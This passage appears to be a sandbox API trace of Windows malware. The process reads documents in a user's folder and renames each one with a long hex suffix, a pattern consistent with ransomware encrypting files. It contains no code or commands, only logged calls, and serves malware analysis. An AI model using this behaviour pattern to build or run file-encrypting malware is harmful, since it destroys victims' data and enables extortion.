ReadFile (in: hFile=0x32c, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0124.323] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.331] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.331] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\td4CEUua6yjCTmb2.ppt", lpString2=".493CDE9CB9667E4211459DF0AC0DB783FBD39C33432D1F1BE3892ABED36F2730" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\td4CEUua6yjCTmb2.ppt.493CDE9CB9667E4211459DF0AC0DB783FBD39C33432D1F1BE3892ABED36F2730") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\td4CEUua6yjCTmb2.ppt.493CDE9CB9667E4211459DF0AC0DB783FBD39C33432D1F1BE3892ABED36F2730" [0124.331] GetProcessHeap () returned 0x600000 [0124.331] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x180) returned 0x6d7070 [0124.331] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x28fff60, FileInformation=0x6d7070, Length=0x180, FileInformationClass=0xa) returned 0x0 [0124.332] CloseHandle (hObject=0x334) returned 1 [0124.332] GetProcessHeap () returned 0x600000 [0124.332] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.335] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.336] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x336e010, ReturnLength=0x28fff70) returned 0x0 [0124.337] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\zgUDzZupJ.xlsx", lpString2=".5A24BF3BF9A1FEBC8608F611EAAA04430DD648922007D6D912105E20CD65A860" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\zgUDzZupJ.xlsx.5A24BF3BF9A1FEBC8608F611EAAA04430DD648922007D6D912105E20CD65A860") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\zgUDzZupJ.xlsx.5A24BF3BF9A1FEBC8608F611EAAA04430DD648922007D6D912105E20CD65A860" [0124.337] GetProcessHeap () returned 0x600000 [0124.337] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x174) returned 0x6d7380 [0124.337] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x28fff60, FileInformation=0x6d7380, Length=0x174, FileInformationClass=0xa) returned 0x0 [0124.338] CloseHandle (hObject=0x33c) returned 1 [0124.338] GetProcessHeap () returned 0x600000 [0124.338] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.339] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.344] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.344] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.345] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.346] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\hE0 RR3T.csv", lpString2=".94095CC08DFACF106F2E131515CB9FAF7540A80C569E7C79C5E5A102FECCEE13" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\hE0 RR3T.csv.94095CC08DFACF106F2E131515CB9FAF7540A80C569E7C79C5E5A102FECCEE13") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\hE0 RR3T.csv.94095CC08DFACF106F2E131515CB9FAF7540A80C569E7C79C5E5A102FECCEE13" [0124.346] GetProcessHeap () returned 0x600000 [0124.346] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x13e) returned 0x3119ce0 [0124.346] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x28fff60, FileInformation=0x3119ce0, Length=0x13e, FileInformationClass=0xa) returned 0x0 [0124.347] CloseHandle (hObject=0x328) returned 1 [0124.347] GetProcessHeap () returned 0x600000 [0124.347] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.347] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.350] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.350] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.351] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.352] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\jIxbGzT PVemDh0y5bdY.pdf", lpString2=".9C5D74BF5CD5145E012D06BCB172F1C73E574BFAF043951659F7E8EF3FC37F07" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\jIxbGzT PVemDh0y5bdY.pdf.9C5D74BF5CD5145E012D06BCB172F1C73E574BFAF043951659F7E8EF3FC37F07") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\jIxbGzT PVemDh0y5bdY.pdf.9C5D74BF5CD5145E012D06BCB172F1C73E574BFAF043951659F7E8EF3FC37F07" [0124.352] GetProcessHeap () returned 0x600000 [0124.352] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x156) returned 0x3119e28 [0124.352] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x28fff60, FileInformation=0x3119e28, Length=0x156, FileInformationClass=0xa) returned 0x0 [0124.353] CloseHandle (hObject=0x328) returned 1 [0124.353] GetProcessHeap () returned 0x600000 [0124.353] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.353] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.362] ReadFile (in: hFile=0x32c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.362] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.363] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.363] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\GY7EJdy5HHWlGnd.docx", lpString2=".055DA81AEBDBD050ADFB9A152B28D12D9B120EBE23E3C4AEAEA82A3E71D3BF04" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\GY7EJdy5HHWlGnd.docx.055DA81AEBDBD050ADFB9A152B28D12D9B120EBE23E3C4AEAEA82A3E71D3BF04") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\GY7EJdy5HHWlGnd.docx.055DA81AEBDBD050ADFB9A152B28D12D9B120EBE23E3C4AEAEA82A3E71D3BF04" [0124.363] GetProcessHeap () returned 0x600000 [0124.363] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x126) returned 0x3153a18 [0124.363] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x3153a18, Length=0x126, FileInformationClass=0xa) returned 0x0 [0124.364] CloseHandle (hObject=0x32c) returned 1 [0124.366] GetProcessHeap () returned 0x600000 [0124.366] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.366] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.368] ReadFile (in: hFile=0x32c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.369] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.370] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.370] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\ibxevBOlAasZ.xlsx", lpString2=".E930BB7A6E82419A6404F384B4302BD4E0B0F1C9CD0EB135CEDCEAAC393E4732" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\ibxevBOlAasZ.xlsx.E930BB7A6E82419A6404F384B4302BD4E0B0F1C9CD0EB135CEDCEAAC393E4732") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\ibxevBOlAasZ.xlsx.E930BB7A6E82419A6404F384B4302BD4E0B0F1C9CD0EB135CEDCEAAC393E4732" [0124.370] GetProcessHeap () returned 0x600000 [0124.370] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x120) returned 0x3368f68 [0124.370] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x3368f68, Length=0x120, FileInformationClass=0xa) returned 0x0 [0124.371] CloseHandle (hObject=0x32c) returned 1 [0124.371] GetProcessHeap () returned 0x600000 [0124.371] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.372] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.374] ReadFile (in: hFile=0x32c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.374] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.375] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.376] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\iWa1kf8wAaZIPCZeO.xlsx", lpString2=".296C96CFBFD7EEDFC95FC1AD5EE95DA018EEBCF8B638C130CF71F3A589B73330" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\iWa1kf8wAaZIPCZeO.xlsx.296C96CFBFD7EEDFC95FC1AD5EE95DA018EEBCF8B638C130CF71F3A589B73330") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\iWa1kf8wAaZIPCZeO.xlsx.296C96CFBFD7EEDFC95FC1AD5EE95DA018EEBCF8B638C130CF71F3A589B73330" [0124.376] GetProcessHeap () returned 0x600000 [0124.376] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12a) returned 0x3154648 [0124.376] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x3154648, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0124.377] CloseHandle (hObject=0x32c) returned 1 [0124.377] GetProcessHeap () returned 0x600000 [0124.377] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.378] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.380] ReadFile (in: hFile=0x32c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.383] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.384] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.384] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\J2I7Gvg92W.docx", lpString2=".F48E2D2F0BA0A63AD02FC972F53A681EF7A3F208A2F8CBFFB1D7D7930800AC34" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\J2I7Gvg92W.docx.F48E2D2F0BA0A63AD02FC972F53A681EF7A3F208A2F8CBFFB1D7D7930800AC34") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\J2I7Gvg92W.docx.F48E2D2F0BA0A63AD02FC972F53A681EF7A3F208A2F8CBFFB1D7D7930800AC34" [0124.384] GetProcessHeap () returned 0x600000 [0124.384] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11c) returned 0x3118078 [0124.384] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x3118078, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0124.385] CloseHandle (hObject=0x32c) returned 1 [0124.386] GetProcessHeap () returned 0x600000 [0124.386] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.386] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.389] ReadFile (in: hFile=0x32c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.389] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.390] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.390] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\JD6g41iiZ3mVewQIJjeA.docx", lpString2=".21FADB717F0A7E60F08F565489A4CB9CBF5D53D08FDB8BB68FE18BCF1E09D229" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\JD6g41iiZ3mVewQIJjeA.docx.21FADB717F0A7E60F08F565489A4CB9CBF5D53D08FDB8BB68FE18BCF1E09D229") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\JD6g41iiZ3mVewQIJjeA.docx.21FADB717F0A7E60F08F565489A4CB9CBF5D53D08FDB8BB68FE18BCF1E09D229" [0124.390] GetProcessHeap () returned 0x600000 [0124.390] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x130) returned 0x31532c8 [0124.390] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x31532c8, Length=0x130, FileInformationClass=0xa) returned 0x0 [0124.391] CloseHandle (hObject=0x32c) returned 1 [0124.392] GetProcessHeap () returned 0x600000 [0124.392] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.392] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.394] ReadFile (in: hFile=0x32c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.395] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.395] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.396] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\KGnuM6mr2xcP0kdd.docx", lpString2=".AA32B6002828B78927A454E56BDA6FD473CB026E845EA408EFA5D630873BEA5D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\KGnuM6mr2xcP0kdd.docx.AA32B6002828B78927A454E56BDA6FD473CB026E845EA408EFA5D630873BEA5D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\KGnuM6mr2xcP0kdd.docx.AA32B6002828B78927A454E56BDA6FD473CB026E845EA408EFA5D630873BEA5D" [0124.396] GetProcessHeap () returned 0x600000 [0124.396] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x128) returned 0x3153b50 [0124.396] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x3153b50, Length=0x128, FileInformationClass=0xa) returned 0x0 [0124.397] CloseHandle (hObject=0x32c) returned 1 [0124.397] GetProcessHeap () returned 0x600000 [0124.397] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.398] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.404] ReadFile (in: hFile=0x32c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.404] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.405] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.406] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\KzLy4AV867esTizNgj.docx", lpString2=".9BC5537FC418302AC1D19127A376BEDD378BD71C0066F3F746B17EC7DD0B9344" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\KzLy4AV867esTizNgj.docx.9BC5537FC418302AC1D19127A376BEDD378BD71C0066F3F746B17EC7DD0B9344") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\KzLy4AV867esTizNgj.docx.9BC5537FC418302AC1D19127A376BEDD378BD71C0066F3F746B17EC7DD0B9344" [0124.406] GetProcessHeap () returned 0x600000 [0124.406] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12c) returned 0x3154780 [0124.406] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x3154780, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0124.407] CloseHandle (hObject=0x32c) returned 1 [0124.407] GetProcessHeap () returned 0x600000 [0124.407] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.407] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.410] ReadFile (in: hFile=0x32c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.410] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.411] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.412] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\mteyX5r.xlsx", lpString2=".D18BE148790010A594D3B8A6A90243D84EECF214769A7EE902514BF8A60DC768" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\mteyX5r.xlsx.D18BE148790010A594D3B8A6A90243D84EECF214769A7EE902514BF8A60DC768") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\mteyX5r.xlsx.D18BE148790010A594D3B8A6A90243D84EECF214769A7EE902514BF8A60DC768" [0124.412] GetProcessHeap () returned 0x600000 [0124.412] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x116) returned 0x31189b8 [0124.412] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x31189b8, Length=0x116, FileInformationClass=0xa) returned 0x0 [0124.413] CloseHandle (hObject=0x32c) returned 1 [0124.413] GetProcessHeap () returned 0x600000 [0124.413] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.413] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.416] ReadFile (in: hFile=0x32c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.416] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.418] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 